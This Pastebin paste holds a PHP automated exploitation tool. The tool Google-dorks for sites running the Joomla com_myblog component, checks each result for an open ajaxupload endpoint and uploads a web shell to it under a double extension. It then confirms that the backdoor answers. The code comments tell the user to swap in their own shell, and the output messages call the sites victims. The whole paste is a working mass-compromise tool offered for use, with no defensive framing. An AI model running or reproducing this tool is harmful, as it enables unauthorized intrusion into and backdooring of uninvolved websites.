Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- function letItBy() {
- ob_flush();
- flush();
- }
- function google_that($query, $page=1){
- $resultPerPage=8;
- $start = $page*$resultPerPage;
- $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw[&key=API_KEY_GOOGLE]&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); // you can delete this "[&key=API_KEY_GOOGLE]" if you haven't google API Key
- $resultFromGoogle = json_decode( http_get($url, true) ,true);
- if(isset($resultFromGoogle['responseStatus'])) {
- if($resultFromGoogle['responseStatus'] != '200') return false;
- if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
- else return $resultFromGoogle['responseData']['results'];
- } else
- die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
- }
- function http_get($url, $safemode = false){
- if($safemode === true) sleep(1);
- $im = curl_init($url);
- curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($im, CURLOPT_HEADER, 0);
- return curl_exec($im);
- curl_close();
- }
- function check_injection($url){
- $data = http_get( str_replace("=com_myblog", "=com_myblog&task=ajaxupload", $url) );
- return preg_match("/No file has been uploaded/", $data);
- }
- function cekshell($url) {
- $d = curl_init($url);
- curl_setopt($d, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($d, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($d, CURLOPT_POST, 1);
- return preg_match("/IndoXploit Auto Xploiter !!!|Mr. Error 404/", curl_exec($d)); // change this value "IndoXploit Auto Xploiter !!!|Mr. Error 404" to your hacker name or the name of your script/shell backdoor ex: "Hidden Uploader by Indonesian Hacker|Mr. Hacker"
- curl_close($d);
- }
- ?>
- <!DOCTYPE html>
- <style type="text/css">
- a {
- text-decoration: none;
- color: green;
- }
- </style>
- <form method="post">
- Dork:
- <input style="border: 1px dashed #000; background: transparent; color: #bb0000; padding-left: 5px;" type="text" id="dork" name="dork" value="inurl:/index.php?option=com_myblog" />
- <input style="border: 1px dashed #000; background: transparent; color: #bb0000;" type="submit" value="Start" id="button"/>
- </form>
- <?php
- if(isset($_POST['dork']{0})){
- echo "<hr width='50%' color='#008000'>";
- letItBy();
- for($googlePage = 1; $googlePage <= 10; $googlePage++){
- $googleResult = google_that($_POST['dork'], $googlePage);
- if(!$googleResult){
- echo 'google dont have more result, so I done..(?)';
- break;
- }
- for($victim = 0; $victim < sizeof($googleResult); $victim++) {
- if(check_injection($googleResult[$victim]['unescapedUrl'])){
- echo "<div style='margin: 5px auto; padding-left: 7px;'>";
- $site = "http://".$googleResult[$victim]['visibleUrl']."/index.php?option=com_myblog&task=ajaxupload";
- echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
- echo "[+] Ada Cuk!! => <a href='$site' target='_blank'> $site </a><br>";
- echo "[?] Bntr ya , mau di anu dulu :p<br>";
- $file = "gtg.php.xxxjpg"; // your name pf shell and the extension must .php.xxxjpg ex: "c99.php.xxxjpg"
- $x = curl_init($site);
- curl_setopt($x, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($x, CURLOPT_POST, 1);
- curl_setopt($x, CURLOPT_POSTFIELDS, array('fileToUpload'=>"@$file"));
- $res = curl_exec($x);
- preg_match("/source: '(.*?)'/", $res, $get);
- $loc = $get[1];
- if(preg_match("/uploaded successfully|File exists|successfully uploaded|File with similar name already exist/", $res)) {
- echo "[+] <font color=green>Wih Hoki bener lu cok !! Sukses di anu => <a href='$loc' target='_blank'> $loc </a> <==</font>","<br>";
- if(cekshell($loc)) {
- echo "[+] <font color=green>Shell OK!! </font><br>";
- } else {
- echo "[-] <font color=red>Shell Error!! </font><br>";
- }
- } else {
- echo "[-] <font color=red>Yah Gagal Di Anu cok xixixi :p</font><br>";
- }
- echo "</div>";
- curl_close($x);
- }
- else echo "<div style='margin: 5px auto; padding-left: 7px;'>";
- echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
- echo "[-] <font color=red>Ga nemu cuk! </font><br>";
- echo "</div>";
- letItBy();
- }
- }
- }
- ?>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement